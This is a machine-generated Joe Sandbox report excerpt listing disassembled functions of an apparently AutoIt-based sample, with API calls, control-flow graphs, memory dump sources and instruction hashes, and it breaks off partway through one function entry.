                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                            • String ID: H
                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                            • Opcode ID: 70c732c68a804222eed113f807d91025dbacc941ccb55db429acc3113b01a6c0
                                                                                                                                                                            • Instruction ID: 93da597b545e7f44c113aa2e2b65206eaee5960782b864c0eaa7379b8b6074b4
                                                                                                                                                                            • Opcode Fuzzy Hash: 70c732c68a804222eed113f807d91025dbacc941ccb55db429acc3113b01a6c0
                                                                                                                                                                            • Instruction Fuzzy Hash: 15A13532A142588FDF19EF68D852BAD3BA0FB16324F180159F815DB391D7319912DF92
                                                                                                                                                                            Function 0085522E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0085551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00855539
                                                                                                                                                                              • Part of subcall function 008551BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 008551E1
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0085534B
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00894BD7
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00894C18
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00894C5A
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00894CC1
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00894CD0
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                            • API String ID: 98802146-2727554177
                                                                                                                                                                            • Opcode ID: 2375fe27785d6ace6d8300393206549534232963f7ed6ac7998c64b0261d59f1
                                                                                                                                                                            • Instruction ID: 197a863ec8a7d859236955ff6cac0fa3d1d2b82f5ac954b76b80079253043082
                                                                                                                                                                            • Opcode Fuzzy Hash: 2375fe27785d6ace6d8300393206549534232963f7ed6ac7998c64b0261d59f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 2E717E715183009EC720EF69EC8199BBBE8FF99350F80442DF845C72A1EB759B4ADB52
                                                                                                                                                                            Function 0085345A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00853465
                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00853474
                                                                                                                                                                            • LoadIconW.USER32(00000063), ref: 0085348A
                                                                                                                                                                            • LoadIconW.USER32(000000A4), ref: 0085349C
                                                                                                                                                                            • LoadIconW.USER32(000000A2), ref: 008534AE
                                                                                                                                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008534C6
                                                                                                                                                                            • RegisterClassExW.USER32(?), ref: 00853517
                                                                                                                                                                              • Part of subcall function 008535AB: GetSysColorBrush.USER32(0000000F), ref: 008535DE
                                                                                                                                                                              • Part of subcall function 008535AB: RegisterClassExW.USER32(00000030), ref: 00853608
                                                                                                                                                                              • Part of subcall function 008535AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00853619
                                                                                                                                                                              • Part of subcall function 008535AB: InitCommonControlsEx.COMCTL32(?), ref: 00853636
                                                                                                                                                                              • Part of subcall function 008535AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00853646
                                                                                                                                                                              • Part of subcall function 008535AB: LoadIconW.USER32(000000A9), ref: 0085365C
                                                                                                                                                                              • Part of subcall function 008535AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 0085366B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                            • String ID: #$0$AutoIt v3
                                                                                                                                                                            • API String ID: 423443420-4155596026
                                                                                                                                                                            • Opcode ID: 90d9c6af47d4282789a26bb0fe12ae82f1e4fe3cb3be7796285fee0a87b1394b
                                                                                                                                                                            • Instruction ID: 2adf2bdce4c6027e4ffc83bcb86c88a64332dae56d5f09ea354bac661d131baf
                                                                                                                                                                            • Opcode Fuzzy Hash: 90d9c6af47d4282789a26bb0fe12ae82f1e4fe3cb3be7796285fee0a87b1394b
                                                                                                                                                                            • Instruction Fuzzy Hash: FD214FB0D24354BBDB20DFA5EC95A997FF4FB0CB50F00401AF604AA2A0D3B9455AAF90
                                                                                                                                                                            Function 00853AA3 Relevance: 16.3, APIs: 3, Strings: 6, Instructions: 532COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 819 853aa3-853ac6 820 894139-89414c call 8ba12a 819->820 821 853acc-853b35 call 87019b call 857953 call 85bf07 call 857953 * 2 call 856e52 819->821 827 894153-89415b 820->827 855 89456b-89457b call 8ba12a 821->855 856 853b3b-853b48 call 856cce call 856b12 821->856 829 89416b-894173 827->829 830 89415d-894165 827->830 833 89417e-894186 829->833 834 894175-89417c 829->834 830->829 832 853b64-853bd3 call 85bf07 call 853a70 call 85bf07 call 85557e call 8541c9 call 856bfa 830->832 870 853bd9-853c48 call 85bf07 * 2 call 85694e call 857af4 SetCurrentDirectoryW call 85bd2c * 2 call 87019b call 8541a6 832->870 871 8941b4-8941bf 832->871 838 894188-89418f 833->838 839 894191-894199 833->839 837 8941a6-8941af call 8bd4bf 834->837 837->832 838->837 839->832 843 89419f-8941a1 839->843 843->837 862 894580 855->862 866 853b4d-853b5e call 856afb 856->866 862->862 866->827 866->832 915 853c4c-853c51 870->915 871->870 873 8941c5-8941f8 call 857953 call 85636d 871->873 882 8941fe-894225 call 8c35cd call 8563db 873->882 883 894502-894519 call 8ba12a 873->883 882->883 897 89422b-8942a7 call 87016b call 85bc23 call 85bb3d 882->897 891 853da5-853df0 call 85bd2c * 2 call 857953 call 85bd2c call 857953 call 8701a4 883->891 921 8942ad-8942cf call 85bc23 897->921 922 89446f-8944ab call 85bc23 call 8c13a0 call 8b4a0c call 874d0e 897->922 918 853c57-853c64 call 85ad74 915->918 919 853d71-853d92 call 857953 SetCurrentDirectoryW 915->919 918->919 935 853c6a-853c86 call 854093 call 853ff3 918->935 919->891 936 853d94-853da2 call 87015d call 8701a4 919->936 933 8942d1-8942e0 921->933 934 8942e5-8942f0 call 8c14a6 921->934 966 8944ad-8944d2 call 855c10 call 8701a4 call 8c1388 922->966 939 894401-894414 call 85bb3d 933->939 949 89430d-894318 call 8c1492 934->949 950 8942f2-894308 934->950 964 89454e-894566 call 8ba12a 935->964 965 853c8c-853ca3 call 853fb8 call 874cf3 935->965 936->891 939->921 955 89441a-894424 939->955 969 89431a-894329 949->969 970 89432e-894339 call 86e607 949->970 950->939 961 894457 call 8ba486 955->961 962 894426-894434 955->962 975 89445c-894469 961->975 962->961 967 894436-894455 call 8540e0 962->967 964->919 988 853ca5-853cc0 call 876755 965->988 989 853cc6-853cc9 965->989 966->891 967->975 969->939 970->939 984 89433f-89435b call 8b9f0d 970->984 975->921 975->922 1000 89438a-89438d 984->1000 1001 89435d-894388 call 85b25f call 85bd2c 984->1001 988->989 990 853df3-853df9 988->990 989->990 991 853ccf-853cd4 989->991 990->991 999 853dff-89452a 990->999 996 89452f-894537 call 8b9dd5 991->996 997 853cda-853d13 call 85b25f call 853e15 991->997 1020 89453c-89453f 996->1020 1029 853d15-853d2c call 8701a4 call 87015d 997->1029 1030 853d30-853d32 997->1030 999->991 1005 8943c9-8943cc 1000->1005 1006 89438f-8943b5 call 85b25f call 857d27 call 85bd2c 1000->1006 1042 8943b6-8943c7 call 85bc23 1001->1042 1009 8943ed-8943f1 call 8c142e 1005->1009 1010 8943ce-8943d7 call 8b9e3c 1005->1010 1006->1042 1022 8943f6-894400 call 8701a4 1009->1022 1025 8943dd-8943e8 call 8701a4 1010->1025 1026 8944d7-894500 call 8ba12a call 8701a4 call 874d0e 1010->1026 1027 894545-894549 1020->1027 1028 853e08-853e10 1020->1028 1022->939 1025->921 1026->966 1027->1028 1037 853d5e-853d6b 1028->1037 1029->1030 1040 853e04 1030->1040 1041 853d38-853d3b 1030->1041 1037->915 1037->919 1040->1028 1041->1028 1047 853d41-853d44 1041->1047 1042->1022 1047->1020 1048 853d4a-853d59 call 8540e0 1047->1048 1048->1037
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00857953: CloseHandle.KERNELBASE(?,?,00000000,00893A1C), ref: 00857973
                                                                                                                                                                              • Part of subcall function 00856E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00853B33,?,00008000), ref: 00856E80
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00853C17
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00853C96
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00853D81
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                            • API String ID: 3350465876-3738523708
                                                                                                                                                                            • Opcode ID: f9ef43163de6f3a0c4adb49ebd3b52fb8728f81a3445f872f435504f990136ab
                                                                                                                                                                            • Instruction ID: 2d0bd931b909ed373faddba5c73556ee4e8e61a19820a29e3f5da43c2ca908f7
                                                                                                                                                                            • Opcode Fuzzy Hash: f9ef43163de6f3a0c4adb49ebd3b52fb8728f81a3445f872f435504f990136ab
                                                                                                                                                                            • Instruction Fuzzy Hash: A02256701083449BCB24EF68C881AAEBBE5FF95355F04491DF886D72A2DB709A49CB53
                                                                                                                                                                            Function 00853696 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1058 853696-8536ab 1059 8536ad-8536b0 1058->1059 1060 85370b-85370d 1058->1060 1062 853711 1059->1062 1063 8536b2-8536b9 1059->1063 1060->1059 1061 85370f 1060->1061 1064 8536f6-8536fe DefWindowProcW 1061->1064 1065 853717-85371c 1062->1065 1066 893dce-893df6 call 852f24 call 86f1c6 1062->1066 1067 8536bf-8536c4 1063->1067 1068 85378b-853793 PostQuitMessage 1063->1068 1069 853704-85370a 1064->1069 1071 853743-85376a SetTimer RegisterWindowMessageW 1065->1071 1072 85371e-853721 1065->1072 1100 893dfb-893e02 1066->1100 1073 893e3b-893e4f call 8bc80c 1067->1073 1074 8536ca-8536ce 1067->1074 1070 85373f-853741 1068->1070 1070->1069 1071->1070 1078 85376c-853777 CreatePopupMenu 1071->1078 1076 853727-85373a KillTimer call 85388e call 85572c 1072->1076 1077 893d6f-893d72 1072->1077 1073->1070 1091 893e55 1073->1091 1079 853795-85379f call 86fcbb 1074->1079 1080 8536d4-8536d9 1074->1080 1076->1070 1085 893daa-893dc9 MoveWindow 1077->1085 1086 893d74-893d78 1077->1086 1078->1070 1093 8537a4 1079->1093 1088 893e20-893e27 1080->1088 1089 8536df-8536e4 1080->1089 1085->1070 1094 893d99-893da5 SetFocus 1086->1094 1095 893d7a-893d7d 1086->1095 1088->1064 1097 893e2d-893e36 call 8b1367 1088->1097 1098 853779-853789 call 8537a6 1089->1098 1099 8536ea-8536f0 1089->1099 1091->1064 1093->1070 1094->1070 1095->1099 1101 893d83-893d94 call 852f24 1095->1101 1097->1064 1098->1070 1099->1064 1099->1100 1100->1064 1106 893e08-893e1b call 85388e call 8538f2 1100->1106 1101->1070 1106->1064
                                                                                                                                                                            APIs
                                                                                                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00853690,?,?), ref: 008536FE
                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00853690,?,?), ref: 0085372A
                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0085374D
                                                                                                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00853690,?,?), ref: 00853758
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 0085376C
                                                                                                                                                                            • PostQuitMessage.USER32(00000000), ref: 0085378D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                            • String ID: TaskbarCreated
                                                                                                                                                                            • API String ID: 129472671-2362178303
                                                                                                                                                                            • Opcode ID: d96e2a2fc591ec128e359513519ba32f0713c2e8929eab707e82a81765072160
                                                                                                                                                                            • Instruction ID: 8a8dc6059c8bc34dd9e555d5dbad5e168398e951fadf33d0e0d344910781b675
                                                                                                                                                                            • Opcode Fuzzy Hash: d96e2a2fc591ec128e359513519ba32f0713c2e8929eab707e82a81765072160
                                                                                                                                                                            • Instruction Fuzzy Hash: DE4179B4518244BBDB346B38DC4AB793A95F709392F044138FD11CA2A5CB749F4DA762
                                                                                                                                                                            Function 00852A52 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1114 852a52-852a8b 1115 852a91-852aa7 mciSendStringW 1114->1115 1116 8939f4-8939f5 DestroyWindow 1114->1116 1117 852aad-852ab5 1115->1117 1118 852d08-852d15 1115->1118 1119 893a00-893a0d 1116->1119 1117->1119 1120 852abb-852aca call 852e70 1117->1120 1121 852d17-852d32 UnregisterHotKey 1118->1121 1122 852d3a-852d41 1118->1122 1123 893a3c-893a43 1119->1123 1124 893a0f-893a12 1119->1124 1135 893a4a-893a56 1120->1135 1136 852ad0-852ad8 1120->1136 1121->1122 1126 852d34-852d35 call 852712 1121->1126 1122->1117 1127 852d47 1122->1127 1123->1119 1132 893a45 1123->1132 1128 893a1e-893a21 FindClose 1124->1128 1129 893a14-893a1c call 857953 1124->1129 1126->1122 1127->1118 1134 893a27-893a34 1128->1134 1129->1134 1132->1135 1134->1123 1138 893a36-893a37 call 8c3c0b 1134->1138 1141 893a58-893a5a FreeLibrary 1135->1141 1142 893a60-893a67 1135->1142 1139 893a6e-893a7b 1136->1139 1140 852ade-852b03 call 85e650 1136->1140 1138->1123 1144 893a7d-893a9a VirtualFree 1139->1144 1145 893aa2-893aa9 1139->1145 1152 852b05 1140->1152 1153 852b3a-852b45 CoUninitialize 1140->1153 1141->1142 1142->1135 1143 893a69 1142->1143 1143->1139 1144->1145 1148 893a9c-893a9d call 8c3c71 1144->1148 1145->1139 1149 893aab 1145->1149 1148->1145 1154 893ab0-893ab4 1149->1154 1156 852b08-852b38 call 853047 call 852ff0 1152->1156 1153->1154 1155 852b4b-852b50 1153->1155 1154->1155 1159 893aba-893ac0 1154->1159 1157 852b56-852b60 1155->1157 1158 893ac5-893ad2 call 8c3c45 1155->1158 1156->1153 1161 852b66-852b71 call 85bd2c 1157->1161 1162 852d49-852d56 call 86fb27 1157->1162 1170 893ad4 1158->1170 1159->1155 1174 852b77 call 852f86 1161->1174 1162->1161 1175 852d5c 1162->1175 1176 893ad9-893afb call 87015d 1170->1176 1177 852b7c-852be7 call 852e17 call 8701a4 call 852dbe call 85bd2c call 85e650 call 852e40 call 8701a4 1174->1177 1175->1162 1182 893afd 1176->1182 1177->1176 1204 852bed-852c11 call 8701a4 1177->1204 1185 893b02-893b24 call 87015d 1182->1185 1192 893b26 1185->1192 1195 893b2b-893b4d call 87015d 1192->1195 1200 893b4f 1195->1200 1203 893b54-893b61 call 8b6d63 1200->1203 1209 893b63 1203->1209 1204->1185 1210 852c17-852c3b call 8701a4 1204->1210 1212 893b68-893b75 call 86bd6a 1209->1212 1210->1195 1215 852c41-852c5b call 8701a4 1210->1215 1219 893b77 1212->1219 1215->1203 1220 852c61-852c85 call 852e17 call 8701a4 1215->1220 1222 893b7c-893b89 call 8c3b9f 1219->1222 1220->1212 1229 852c8b-852c93 1220->1229 1228 893b8b 1222->1228 1230 893b90-893b9d call 8c3c26 1228->1230 1229->1222 1231 852c99-852caa call 85bd2c call 852f4c 1229->1231 1236 893b9f 1230->1236 1238 852caf-852cb7 1231->1238 1239 893ba4-893bb1 call 8c3c26 1236->1239 1238->1230 1240 852cbd-852ccb 1238->1240 1245 893bb3 1239->1245 1240->1239 1242 852cd1-852d07 call 85bd2c * 3 call 852eb8 1240->1242 1245->1245
                                                                                                                                                                            APIs
                                                                                                                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00852A9B
                                                                                                                                                                            • CoUninitialize.COMBASE ref: 00852B3A
                                                                                                                                                                            • UnregisterHotKey.USER32(?), ref: 00852D1F
                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 008939F5
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 00893A5A
                                                                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00893A87
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                            • String ID: close all
                                                                                                                                                                            • API String ID: 469580280-3243417748
                                                                                                                                                                            • Opcode ID: cf965a12653ed88eb7d4b87cd158513914a56c45aa62fc271d45c9b2ecf7c049
                                                                                                                                                                            • Instruction ID: 7de6af490814ce4c61df219a5301dce4856754a6b9fc8ab971e2992839c965f4
                                                                                                                                                                            • Opcode Fuzzy Hash: cf965a12653ed88eb7d4b87cd158513914a56c45aa62fc271d45c9b2ecf7c049
                                                                                                                                                                            • Instruction Fuzzy Hash: 00D14A31701222CFCB19EF19C895A29F7A0FF06715F1441ADE94AEB252CB31AD1ACF91
                                                                                                                                                                            Function 008C874A Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 1253 8c874a-8c878c call 8922f0 call 858e70 1258 8c878e-8c879c call 85c92d 1253->1258 1259 8c87a2 1253->1259 1258->1259 1267 8c879e-8c87a0 1258->1267 1260 8c87a4-8c87b0 1259->1260 1262 8c886d-8c891f call 858e70 call 85557e call 87d913 call 8793c8 * 2 GetCurrentDirectoryW SetCurrentDirectoryW 1260->1262 1263 8c87b6 1260->1263 1299 8c8921-8c892d call 8be387 1262->1299 1300 8c8973-8c8984 call 85e650 1262->1300 1266 8c87ba-8c87c0 1263->1266 1269 8c87ca-8c87cf 1266->1269 1270 8c87c2-8c87c8 1266->1270 1267->1260 1273 8c87d9-8c87df 1269->1273 1274 8c87d1-8c87d4 1269->1274 1272 8c87d6 1270->1272 1272->1273 1276 8c8848-8c884a 1273->1276 1277 8c87e1-8c87e4 1273->1277 1274->1272 1280 8c884b-8c884e 1276->1280 1277->1276 1279 8c87e6-8c87e9 1277->1279 1282 8c87eb-8c87ee 1279->1282 1283 8c8844-8c8846 1279->1283 1284 8c8858 1280->1284 1285 8c8850-8c8856 1280->1285 1282->1283 1288 8c87f0-8c87f3 1282->1288 1289 8c883d-8c883e 1283->1289 1286 8c885c-8c8867 1284->1286 1285->1286 1286->1262 1286->1266 1291 8c87f5-8c87f8 1288->1291 1292 8c8840-8c8842 1288->1292 1289->1280 1291->1292 1294 8c87fa-8c87fd 1291->1294 1292->1289 1296 8c87ff-8c8802 1294->1296 1297 8c883b 1294->1297 1296->1297 1298 8c8804-8c8807 1296->1298 1297->1289 1301 8c8809-8c880c 1298->1301 1302 8c8834-8c8839 1298->1302 1299->1300 1308 8c892f-8c893a call 8be9c5 1299->1308 1311 8c8987-8c898b call 85bd2c 1300->1311 1301->1302 1305 8c880e-8c8811 1301->1305 1302->1280 1309 8c882d-8c8832 1305->1309 1310 8c8813-8c8816 1305->1310 1319 8c89cf 1308->1319 1320 8c8940-8c8967 GetFileAttributesW SetFileAttributesW 1308->1320 1309->1280 1310->1309 1313 8c8818-8c881b 1310->1313 1318 8c8990-8c8998 1311->1318 1316 8c881d-8c8820 1313->1316 1317 8c8826-8c882b 1313->1317 1316->1317 1321 8c899b-8c89af call 85e650 1316->1321 1317->1280 1322 8c89d3-8c89e5 call 8c9f9f 1319->1322 1323 8c8969-8c8971 SetCurrentDirectoryW 1320->1323 1324 8c89b1-8c89b3 1320->1324 1321->1318 1331 8c89ea-8c89ec 1322->1331 1323->1300 1328 8c89b5-8c89cd SetCurrentDirectoryW call 874d13 1324->1328 1329 8c8a02-8c8a0c SetCurrentDirectoryW 1324->1329 1328->1322 1329->1311 1331->1329 1333 8c89ee-8c89fb call 85e650 1331->1333 1333->1329
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008C8907
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?), ref: 008C891B
                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 008C8945
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(?,00000000), ref: 008C895F
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008C8971
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 008C89BA
                                                                                                                                                                            • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 008C8A0A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                            • API String ID: 769691225-438819550
                                                                                                                                                                            • Opcode ID: 16f91a548e6a3096c6171a5f771e258e4025d86bc50c42366dbee464a5008891
                                                                                                                                                                            • Instruction ID: 918a59fd9daca6ad16457b92437e9e54c3f99c9829be92c7cbb49f25492713dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 16f91a548e6a3096c6171a5f771e258e4025d86bc50c42366dbee464a5008891
                                                                                                                                                                            • Instruction Fuzzy Hash: 99819D72544304DBCB20EF58C494EAAB7F8FB98311F54882EF885D7251EB34D949CB92
                                                                                                                                                                            Function 008890D5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
